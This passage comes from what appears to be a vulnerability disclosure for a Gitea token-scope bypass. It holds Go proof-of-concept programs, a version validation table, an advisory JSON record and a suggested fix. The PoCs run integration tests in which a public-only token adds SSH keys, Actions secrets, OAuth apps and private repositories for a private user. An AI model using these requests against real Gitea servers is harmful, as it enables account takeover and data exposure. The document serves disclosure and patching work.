for _, candidate := range candidates {
if _, err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/repo.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s\n", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api_public_only_user_repos_private_repo_bypass_dynamic_poc_test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v\n", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v\n", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserReposBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP_NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s\n", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v\n", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user,write:repository can create a private repository through /api/v1/user/repos")
fmt.Println("reproduced: public-only,read:user,read:repository is still forbidden on the canonical repository endpoint for that repo")
fmt.Println("reproduced: the same public-only token with the route-required read:user,read:repository scope can list the private repository through /api/v1/user/repos")
fmt.Println("condition=private user issues public-only tokens with route-required user and repository scopes")
fmt.Println("cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api_public_only_user_actions_secret_variable_bypass_dynamic_poc.go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth_model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user_model "code.gitea.io/gitea/models/user"
api "code.gitea.io/gitea/modules/structs"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserActionsSecretVariableBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user_model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)
req := NewRequestWithJSON(t, "PUT", "/api/v1/user/actions/secrets/PRIVATE_SECRET", api.CreateOrUpdateSecretOption{
Data: "top-secret",
}).AddTokenAuth(publicOnlyWriteUserToken)
MakeRequest(t, req, http.StatusCreated)
req = NewRequestWithJSON(t, "POST", "/api/v1/user/actions/variables/PRIVATE_VAR", api.CreateVariableOption{
Value: "private-value",
Description: "scoped through public-only token",
}).AddTokenAuth(publicOnlyWriteUserToken)
MakeRequest(t, req, http.StatusCreated)
req = NewRequest(t, "GET", "/api/v1/user/actions/variables/PRIVATE_VAR").AddTokenAuth(publicOnlyWriteUserToken)
resp := MakeRequest(t, req, http.StatusOK)
variable := DecodeJSON(t, resp, &api.ActionVariable{})
require.Equal(t, "PRIVATE_VAR", variable.Name)
require.Equal(t, "private-value", variable.Data)
req = NewRequest(t, "GET", "/api/v1/user/actions/variables").AddTokenAuth(publicOnlyWriteUserToken)
resp = MakeRequest(t, req, http.StatusOK)
variables := DecodeJSON(t, resp, []*api.ActionVariable{})
found := false
for _, v := range variables {
if v.Name == "PRIVATE_VAR" && v.Data == "private-value" {
found = true
break
}
}
require.True(t, found)
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA_REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for _, candidate := range candidates {
if _, err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/action.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s\n", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api_public_only_user_actions_secret_variable_bypass_dynamic_poc_test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v\n", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v\n", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserActionsSecretVariableBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP_NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s\n", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v\n", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can create a user actions secret for the private account")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can create, read, and list user actions variables")
fmt.Println("condition=private user issues a public-only,write:user token")
fmt.Println("cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N")
}
Attachment: api_public_only_user_runner_registration_bypass_dynamic_poc.go
package main
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"strings"
)
const testSource = `// PoC test for private security report.
// SPDX-License-Identifier: MIT
package integration
import (
"net/http"
"testing"
auth_model "code.gitea.io/gitea/models/auth"
"code.gitea.io/gitea/models/unittest"
user_model "code.gitea.io/gitea/models/user"
"code.gitea.io/gitea/tests"
"github.com/stretchr/testify/require"
)
func TestAPIPublicOnlyUserRunnerRegistrationBypass(t *testing.T) {
defer tests.PrepareTestEnv(t)()
privateUser := unittest.AssertExistsAndLoadBean(t, &user_model.User{Name: "user31"})
require.True(t, privateUser.Visibility.IsPrivate())
session := loginUser(t, privateUser.Name)
publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)
MakeRequest(t, NewRequest(t, "GET", "/api/v1/users/user31").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)
resp := MakeRequest(t, NewRequest(t, "POST", "/api/v1/user/actions/runners/registration-token").AddTokenAuth(publicOnlyWriteUserToken), http.StatusOK)
registrationToken := DecodeJSON(t, resp, &map[string]string{})
require.NotEmpty(t, (*registrationToken)["token"])
}
`
func repoPath() string {
candidates := []string{}
if repo := os.Getenv("GITEA_REPO"); repo != "" {
candidates = append(candidates, repo)
}
candidates = append(candidates, "../repo", "../../gitea/repo", "../../gitea")
for _, candidate := range candidates {
if _, err := os.Stat(filepath.Join(candidate, "routers/api/v1/user/runners.go")); err == nil {
return filepath.Clean(candidate)
}
}
fmt.Fprintf(os.Stderr, "could not locate Gitea checkout; tried: %s\n", strings.Join(candidates, ", "))
os.Exit(2)
return ""
}
func main() {
repo := repoPath()
testPath := filepath.Join(repo, "tests/integration/api_public_only_user_runner_registration_bypass_dynamic_poc_test.go")
if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {
fmt.Fprintf(os.Stderr, "write temp test: %v\n", err)
os.Exit(2)
}
defer func() {
if err := os.Remove(testPath); err != nil && !os.IsNotExist(err) {
fmt.Fprintf(os.Stderr, "warning: remove temp test: %v\n", err)
}
}()
cmd := exec.Command("go", "test", "-timeout", "40m", "-run", "TestAPIPublicOnlyUserRunnerRegistrationBypass", "code.gitea.io/gitea/tests/integration")
cmd.Dir = repo
cmd.Env = append(os.Environ(), "SNAP=1", "SNAP_NAME=gitea-test", "GOTOOLCHAIN=auto")
out, err := cmd.CombinedOutput()
fmt.Printf("source=%s\n", repo)
fmt.Print(string(out))
if err != nil {
fmt.Fprintf(os.Stderr, "not reproduced: go test failed: %v\n", err)
os.Exit(1)
}
fmt.Println("reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint")
fmt.Println("reproduced: the same public-only token with the route-required write:user scope can mint a user-level actions runner registration token")
fmt.Println("condition=private user issues a public-only,write:user token")
fmt.Println("cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N")
}
Version validation
Validation date: 2026-05-13
The SSH-key write PoC was used as the representative dynamic test for the systemic /api/v1/user self-route public-only bypass.
| Version | Commit | Result |
|---|---|---|
| main | 6a2706626904 |
reproduced dynamically |
| v1.26.1 | afdbd9b7c5 |
reproduced dynamically |
| v1.25.5 | f913d90ab6 |
reproduced dynamically |
| v1.24.7 | 99053ce4fa |
reproduced dynamically |
| v1.23.8 | cccd54999a |
reproduced dynamically |
| v1.22.6 | 8eefa1f6de |
reproduced dynamically with Go 1.22.12 test toolchain |
The representative version-matrix PoC validates the same root cause across tested releases for the SSH-key self-route write surface. The additional lead/supporting PoCs above were retested on the main checkout listed in the Local PoCs section.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.26.1"
},
"package": {
"ecosystem": "Go",
"name": "code.gitea.io/gitea"
},
"ranges": [
{
"events": [
{
"introduced": "1.22.3"
},
{
"fixed": "1.26.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-24791"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-17T18:09:41Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nMany authenticated self routes under `/api/v1/user/...` do not enforce the `public-only` token restriction. As a result, a token or OAuth grant marked `public-only`, but otherwise carrying the route-required read/write scope category, can access or modify private account resources through self routes.\n\nThe canonical private-user endpoint correctly rejects the same tokens, for example `GET /api/v1/users/{privateUser}` returns `403`. The bypass exists because the generic `/api/v1/user` route group requires user scope and `reqToken()`, but does not enforce the token\u0027s public-only restriction for most self routes.\n\nThis is a systemic token/OAuth scope-boundary bypass, not a single endpoint bug.\n\nThis appears related to the previously fixed public-only token issue tracked as [CVE-2025-68941 / GHSA-xfq3-qj7j-4565](https://github.com/advisories/GHSA-xfq3-qj7j-4565), which affected Gitea `\u003c 1.22.3`. The behavior described here reproduces on tested main checkout `6a2706626904`. A representative SSH-key self-route PoC also reproduces on tested releases through v1.26.1. In other words, this should be treated as an incomplete fix / residual gap in a different route family, not as a duplicate of the older advisory.\n\n## Affected Code\n\nThe generic `/api/v1/user` group is mounted with user scope and `reqToken()`:\n\n- `routers/api/v1/api.go:1008-1128`\n\n`tokenRequiresScopes()` sets `ctx.PublicOnly` when the token contains `public-only`, but the public-only restriction is enforced only by routes that also call `checkTokenPublicOnly()`:\n\n- `routers/api/v1/api.go:241-294` implements `checkTokenPublicOnly()`.\n- `routers/api/v1/api.go:299-341` sets `ctx.PublicOnly` from the token scope.\n\nRepresentative affected routes in that group:\n\n- `/api/v1/user`: private self profile and settings.\n- `/api/v1/user/emails`: read, add, and delete account email addresses.\n- `/api/v1/user/keys`: list and add SSH public keys.\n- `/api/v1/user/applications/oauth2`: list and create OAuth2 applications, including returned client secrets.\n- `/api/v1/user/actions/secrets/{secretname}`: create or delete user-level Actions secrets.\n- `/api/v1/user/actions/variables`: list, read, create, update, and delete user-level Actions variables.\n- `/api/v1/user/actions/runners/...`: list, update, delete runners, and mint registration tokens.\n- `/api/v1/user/actions/runs` and `/api/v1/user/actions/jobs`: list workflow metadata for private repositories.\n- `/api/v1/user/repos`: create private repositories and list private repositories.\n- `/api/v1/user/subscriptions`, `/api/v1/user/times`, `/api/v1/user/stopwatches`, `/api/v1/user/teams`, `/api/v1/user/hooks`: leak or modify private-account resources.\n\nCorrect public-only enforcement for comparison:\n\n- `routers/api/v1/api.go:970-1008` applies `context.UserAssignmentAPI()` and `checkTokenPublicOnly()` to canonical `/api/v1/users/{username}` routes.\n- `routers/api/v1/user/user.go:122-125` rejects public-only access to private users on `/api/v1/users/{username}`.\n- `routers/api/v1/api.go:1091-1092` shows that `/api/v1/user/repos` requires the additional repository scope category, but still does not apply `checkTokenPublicOnly()`.\n\n## Local PoCs\n\nThe following dynamic PoCs were retested on checkout `6a2706626904` and all reproduced successfully. Each PoC writes a temporary integration test, runs it, and removes it afterward.\n\n```bash\ncd pocs\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_self_user_private_profile_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_ssh_key_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_emails_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_oauth_app_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_repos_private_repo_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_actions_secret_variable_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_runner_registration_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_runner_manage_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_webhook_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_actions_runs_private_repo_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_actions_jobs_private_repo_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_subscriptions_private_repo_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_times_private_repo_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_stopwatches_private_repo_bypass_dynamic_poc.go\nGITEA_REPO=/path/to/gitea-checkout GOTOOLCHAIN=auto go run ./api_public_only_user_teams_private_org_bypass_dynamic_poc.go\n```\n\n## Reproduced Impact Examples\n\nUsing private fixture user `user31`, public-only tokens are rejected by `GET /api/v1/users/user31`, but tokens with the route-required scopes can still reach the self routes below.\n\nConfirmed with `public-only,write:user`:\n\n- add SSH keys through `/api/v1/user/keys`;\n- add account emails through `/api/v1/user/emails`;\n- create OAuth2 applications and receive `client_secret` through `/api/v1/user/applications/oauth2`;\n- create/delete user-level Actions secrets;\n- create/read/list/update/delete user-level Actions variables;\n- mint user-level runner registration tokens;\n- manage user-level runners;\n- create user webhooks.\n\nConfirmed with `public-only,read:user`:\n\n- read private self profile/settings and account email surfaces;\n- list OAuth2 applications and user webhooks;\n- list private repository workflow runs/jobs exposed through self Actions routes;\n- list private subscriptions, tracked times, stopwatches, and team memberships.\n\nConfirmed with `public-only` plus the route-required repository category:\n\n- create private repositories through `POST /api/v1/user/repos` with `public-only,write:user,write:repository`;\n- list those private repositories through `GET /api/v1/user/repos` with `public-only,read:user,read:repository`, while the canonical private repository endpoint remains forbidden.\n\n## Impact\n\nThe `public-only` token flag is intended to limit a token or OAuth grant to public resources. These routes violate that boundary for private accounts.\n\nPractical abuse scenarios include:\n\n- a third-party app or leaked token with the route-required write scope, but restricted to public resources, adding SSH credentials or OAuth applications to a private account;\n- a public-resource-restricted token with the route-required write scope modifying Actions secrets/variables or registering/managing runners;\n- a token limited to public resources creating and enumerating private repositories;\n- a supposedly public-only integration learning private repository, workflow, team, timing, subscription, webhook, and email metadata.\n\n## Suggested Fix\n\nApply public-only enforcement consistently to self routes under `/api/v1/user`.\n\nAt minimum:\n\n- for self routes, treat `ctx.Doer` as the target user/resource owner when enforcing `public-only`; mechanically adding `checkTokenPublicOnly()` is not sufficient unless `ctx.ContextUser` is set to `ctx.Doer` or the check explicitly handles self routes;\n- reject `ctx.PublicOnly` on credential, identity, OAuth application, repository creation, webhook, Actions, runner, and email-management self-route mutations;\n- filter list routes so public-only tokens cannot return private repositories, private organization/team metadata, private workflow runs/jobs, private tracked time, private stopwatches, or hidden subscriptions;\n- add regression coverage that compares each affected `/api/v1/user/...` route against the canonical private-user or private-repository endpoint.\n\nNon-public-only tokens should preserve current behavior.\n\n---\n\n## Attachment: `api_public_only_user_ssh_key_bypass_dynamic_poc.go`\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"os\"\n \"os/exec\"\n \"path/filepath\"\n \"strings\"\n)\n\nconst testSource = `// PoC test for private security report.\n// SPDX-License-Identifier: MIT\n\npackage integration\n\nimport (\n \"net/http\"\n \"testing\"\n\n asymkey_model \"code.gitea.io/gitea/models/asymkey\"\n auth_model \"code.gitea.io/gitea/models/auth\"\n \"code.gitea.io/gitea/models/unittest\"\n user_model \"code.gitea.io/gitea/models/user\"\n api \"code.gitea.io/gitea/modules/structs\"\n \"code.gitea.io/gitea/tests\"\n\n \"github.com/stretchr/testify/require\"\n)\n\nfunc TestAPIPublicOnlyUserSSHKeyBypass(t *testing.T) {\n defer tests.PrepareTestEnv(t)()\n\n privateUser := unittest.AssertExistsAndLoadBean(t, \u0026user_model.User{Name: \"user31\"})\n require.True(t, privateUser.Visibility.IsPrivate())\n\n session := loginUser(t, privateUser.Name)\n publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)\n\n MakeRequest(t, NewRequest(t, \"GET\", \"/api/v1/users/user31\").AddTokenAuth(publicOnlyWriteUserToken), http.StatusForbidden)\n\n req := NewRequestWithJSON(t, \"POST\", \"/api/v1/user/keys\", api.CreateKeyOption{\n Title: \"public-only-private-key-bypass\",\n Key: \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4cn+iXnA4KvcQYSV88vGn0Yi91vG47t1P7okprVmhNTkipNRIHWr6WdCO4VDr/cvsRkuVJAsLO2enwjGWWueOO6BodiBgyAOZ/5t5nJNMCNuLGT5UIo/RI1b0WRQwxEZTRjt6mFNw6lH14wRd8ulsr9toSWBPMOGWoYs1PDeDL0JuTjL+tr1SZi/EyxCngpYszKdXllJEHyI79KQgeD0Vt3pTrkbNVTOEcCNqZePSVmUH8X8Vhugz3bnE0/iE9Pb5fkWO9c4AnM1FgI/8Bvp27Fw2ShryIXuR6kKvUqhVMTuOSDHwu6A8jLE5Owt3GAYugDpDYuwTVNGrHLXKpPzrGGPE/jPmaLCMZcsdkec95dYeU3zKODEm8UQZFhmJmDeWVJ36nGrGZHL4J5aTTaeFUJmmXDaJYiJ+K2/ioKgXqnXvltu0A9R8/LGy4nrTJRr4JMLuJFoUXvGm1gXQ70w2LSpk6yl71RNC0hCtsBe8BP8IhYCM0EP5jh7eCMQZNvM= nocomment\",\n }).AddTokenAuth(publicOnlyWriteUserToken)\n resp := MakeRequest(t, req, http.StatusCreated)\n key := DecodeJSON(t, resp, \u0026api.PublicKey{})\n require.Equal(t, \"public-only-private-key-bypass\", key.Title)\n\n unittest.AssertExistsAndLoadBean(t, \u0026asymkey_model.PublicKey{\n ID: key.ID,\n OwnerID: privateUser.ID,\n Name: \"public-only-private-key-bypass\",\n })\n\n req = NewRequest(t, \"GET\", \"/api/v1/user/keys\").AddTokenAuth(publicOnlyWriteUserToken)\n resp = MakeRequest(t, req, http.StatusOK)\n keys := DecodeJSON(t, resp, []api.PublicKey{})\n found := false\n for _, k := range keys {\n if k.ID == key.ID {\n found = true\n break\n }\n }\n require.True(t, found)\n}\n`\n\nfunc repoPath() string {\n candidates := []string{}\n if repo := os.Getenv(\"GITEA_REPO\"); repo != \"\" {\n candidates = append(candidates, repo)\n }\n candidates = append(candidates, \"../repo\", \"../../gitea/repo\", \"../../gitea\")\n\n for _, candidate := range candidates {\n if _, err := os.Stat(filepath.Join(candidate, \"routers/api/v1/user/key.go\")); err == nil {\n return filepath.Clean(candidate)\n }\n }\n fmt.Fprintf(os.Stderr, \"could not locate Gitea checkout; tried: %s\\n\", strings.Join(candidates, \", \"))\n os.Exit(2)\n return \"\"\n}\n\nfunc main() {\n repo := repoPath()\n testPath := filepath.Join(repo, \"tests/integration/api_public_only_user_ssh_key_bypass_dynamic_poc_test.go\")\n if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {\n fmt.Fprintf(os.Stderr, \"write temp test: %v\\n\", err)\n os.Exit(2)\n }\n defer func() {\n if err := os.Remove(testPath); err != nil \u0026\u0026 !os.IsNotExist(err) {\n fmt.Fprintf(os.Stderr, \"warning: remove temp test: %v\\n\", err)\n }\n }()\n\n cmd := exec.Command(\"go\", \"test\", \"-timeout\", \"40m\", \"-run\", \"TestAPIPublicOnlyUserSSHKeyBypass\", \"code.gitea.io/gitea/tests/integration\")\n cmd.Dir = repo\n cmd.Env = append(os.Environ(), \"SNAP=1\", \"SNAP_NAME=gitea-test\", \"GOTOOLCHAIN=auto\")\n out, err := cmd.CombinedOutput()\n fmt.Printf(\"source=%s\\n\", repo)\n fmt.Print(string(out))\n if err != nil {\n fmt.Fprintf(os.Stderr, \"not reproduced: go test failed: %v\\n\", err)\n os.Exit(1)\n }\n fmt.Println(\"reproduced: public-only,write:user is rejected on the canonical private /users/{username} endpoint\")\n fmt.Println(\"reproduced: the same public-only token with the route-required write:user scope can add an SSH public key to the private account through /api/v1/user/keys\")\n fmt.Println(\"reproduced: the same token can list that newly added key through /api/v1/user/keys\")\n fmt.Println(\"condition=private user issues a public-only,write:user token\")\n fmt.Println(\"cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\")\n}\n\n```\n\n---\n\n## Attachment: `api_public_only_user_oauth_app_bypass_dynamic_poc.go`\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"os\"\n \"os/exec\"\n \"path/filepath\"\n \"strings\"\n)\n\nconst testSource = `// PoC test for private security report.\n// SPDX-License-Identifier: MIT\n\npackage integration\n\nimport (\n \"net/http\"\n \"testing\"\n\n auth_model \"code.gitea.io/gitea/models/auth\"\n \"code.gitea.io/gitea/models/unittest\"\n user_model \"code.gitea.io/gitea/models/user\"\n api \"code.gitea.io/gitea/modules/structs\"\n \"code.gitea.io/gitea/tests\"\n\n \"github.com/stretchr/testify/require\"\n)\n\nfunc TestAPIPublicOnlyUserOAuthAppBypass(t *testing.T) {\n defer tests.PrepareTestEnv(t)()\n\n privateUser := unittest.AssertExistsAndLoadBean(t, \u0026user_model.User{Name: \"user31\"})\n require.True(t, privateUser.Visibility.IsPrivate())\n\n session := loginUser(t, privateUser.Name)\n publicOnlyWriteUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeWriteUser)\n publicOnlyReadUserToken := getTokenForLoggedInUser(t, session, auth_model.AccessTokenScopePublicOnly, auth_model.AccessTokenScopeReadUser)\n\n MakeRequest(t, NewRequest(t, \"GET\", \"/api/v1/users/user31\").AddTokenAuth(publicOnlyReadUserToken), http.StatusForbidden)\n\n req := NewRequestWithJSON(t, \"POST\", \"/api/v1/user/applications/oauth2\", \u0026api.CreateOAuth2ApplicationOptions{\n Name: \"public-only-private-oauth-app\",\n RedirectURIs: []string{\"https://example.com/callback\"},\n ConfidentialClient: true,\n }).AddTokenAuth(publicOnlyWriteUserToken)\n resp := MakeRequest(t, req, http.StatusCreated)\n app := DecodeJSON(t, resp, \u0026api.OAuth2Application{})\n require.Equal(t, \"public-only-private-oauth-app\", app.Name)\n require.NotEmpty(t, app.ClientID)\n require.NotEmpty(t, app.ClientSecret)\n\n req = NewRequest(t, \"GET\", \"/api/v1/user/applications/oauth2\").AddTokenAuth(publicOnlyReadUserToken)\n resp = MakeRequest(t, req, http.StatusOK)\n apps := DecodeJSON(t, resp, api.OAuth2ApplicationList{})\n found := false\n for _, a := range apps {\n if a.ID == app.ID \u0026\u0026 a.Name == app.Name {\n found = true\n break\n }\n }\n require.True(t, found)\n}\n`\n\nfunc repoPath() string {\n candidates := []string{}\n if repo := os.Getenv(\"GITEA_REPO\"); repo != \"\" {\n candidates = append(candidates, repo)\n }\n candidates = append(candidates, \"../repo\", \"../../gitea/repo\", \"../../gitea\")\n\n for _, candidate := range candidates {\n if _, err := os.Stat(filepath.Join(candidate, \"routers/api/v1/user/app.go\")); err == nil {\n return filepath.Clean(candidate)\n }\n }\n fmt.Fprintf(os.Stderr, \"could not locate Gitea checkout; tried: %s\\n\", strings.Join(candidates, \", \"))\n os.Exit(2)\n return \"\"\n}\n\nfunc main() {\n repo := repoPath()\n testPath := filepath.Join(repo, \"tests/integration/api_public_only_user_oauth_app_bypass_dynamic_poc_test.go\")\n if err := os.WriteFile(testPath, []byte(testSource), 0o644); err != nil {\n fmt.Fprintf(os.Stderr, \"write temp test: %v\\n\", err)\n os.Exit(2)\n }\n defer func() {\n if err := os.Remove(testPath); err != nil \u0026\u0026 !os.IsNotExist(err) {\n fmt.Fprintf(os.Stderr, \"warning: remove temp test: %v\\n\", err)\n }\n }()\n\n cmd := exec.Command(\"go\", \"test\", \"-timeout\", \"40m\", \"-run\", \"TestAPIPublicOnlyUserOAuthAppBypass\", \"code.gitea.io/gitea/tests/integration\")\n cmd.Dir = repo\n cmd.Env = append(os.Environ(), \"SNAP=1\", \"SNAP_NAME=gitea-test\", \"GOTOOLCHAIN=auto\")\n out, err := cmd.CombinedOutput()\n fmt.Printf(\"source=%s\\n\", repo)\n fmt.Print(string(out))\n if err != nil {\n fmt.Fprintf(os.Stderr, \"not reproduced: go test failed: %v\\n\", err)\n os.Exit(1)\n }\n fmt.Println(\"reproduced: public-only user-scoped tokens are rejected on the canonical private /users/{username} endpoint\")\n fmt.Println(\"reproduced: public-only,write:user can create an OAuth2 application for the private account and receives a client secret\")\n fmt.Println(\"reproduced: public-only,read:user can list that OAuth2 application through /api/v1/user/applications/oauth2\")\n fmt.Println(\"condition=private user issues public-only tokens with route-required user scopes\")\n fmt.Println(\"cvss_candidate=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\")\n}\n\n```\n\n---\n\n## Attachment: `api_public_only_user_repos_private_repo_bypass_dynamic_poc.go`\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"os\"\n \"os/exec\"\n \"path/filepath\"\n \"strings\"\n)\n\nconst testSource = `// PoC test for private security report.\n// SPDX-License-Identifier: MIT\n\npackage integration\n\nimport (\n \"net/http\"\n \"testing\"\n\n auth_model \"code.gitea.io/gitea/models/auth\"\n \"code.gitea.io/gitea/models/unittest\"\n user_model \"code.gitea.io/gitea/models/user\"\n api \"code.gitea.io/gitea/modules/structs\"\n \"code.gitea.io/gitea/tests\"\n\n \"github.com/stretchr/testify/require\"\n)\n\nfunc TestAPIPublicOnlyUserReposBypass(t *testing.T) {\n defer tests.PrepareTestEnv(t)()\n\n privateUser := unittest.AssertExistsAndLoadBean(t, \u0026user_model.User{Name: \"user31\"})\n require.True(t, privateUser.Visibility.IsPrivate())\n\n session := loginUser(t, privateUser.Name)\n publicOnlyReadRepoToken := getTokenForLoggedInUser(t, session,\n auth_model.AccessTokenScopePublicOnly,\n auth_model.AccessTokenScopeReadUser,\n auth_model.AccessTokenScopeReadRepository,\n )\n publicOnlyWriteRepoToken := getTokenForLoggedInUser(t, session,\n auth_model.AccessTokenScopePublicOnly,\n auth_model.AccessTokenScopeWriteUser,\n auth_model.AccessTokenScopeWriteRepository,\n )\n\n req := NewRequestWithJSON(t, \"POST\", \"/api/v1/user/repos\", \u0026api.CreateRepoOption{\n Name: \"public-only-private-repo\",\n Private: true,\n }).AddTokenAuth(publicOnlyWriteRepoToken)\n resp := MakeRequest(t, req, http.StatusCreated)\n created := DecodeJSON(t, resp, \u0026api.Repository{})\n require.Equal(t, \"user31/public-only-private-repo\", created.FullName)\n require.True(t, created.Private)\n\n MakeRequest(t, NewRequest(t, \"GET\", \"/api/v1/repos/user31/public-only-private-repo\").AddTokenAuth(publicOnlyReadRepoToken), http.StatusForbidden)\n\n resp = MakeRequest(t, NewRequest(t, \"GET\", \"/api/v1/user/repos\").AddTokenAuth(publicOnlyReadRepoToken), http.StatusOK)\n repos := DecodeJSON(t, resp, []api.Repository{})\n found := false\n for _, repo := range repos {\n if repo.FullName == \"user31/public-only-private-repo\" {\n found = true\n require.True(t, repo.Private)\n }\n }\n require.True(t, found)\n}\n`\n\nfunc repoPath() string {\n candidates := []string{}\n if repo := os.Getenv(\"GITEA_REPO\"); repo != \"\" {\n candidates = append(candidates, repo)\n }\n candidates = append(candidates, \"../repo\", \"../../gitea/repo\", \"../../gitea\")\n\n for _, candidate := range candidates {\n if _, err := os.Stat(filepath.Join(candidate, \"routers/api/v1/user/repo.go\")); err == nil {\n return filepath.Clean(candidate)\n }\n }\n fmt.Fprintf(os.Stderr, \"could not locate Gitea checkout; tried: %s\\n\", strings.Join(candidates, \", \"))\n os.Exit(2)\n return \"\"\n}\n\nfunc main() {\n repo := repoPath()\n testPath := filepath.Join(repo, \"tests/integration/api_public_only_user_repos_private_repo_bypass_dynamic_poc_test.go\")\n if err := os.WriteFile(testPath, []byte(testSource), 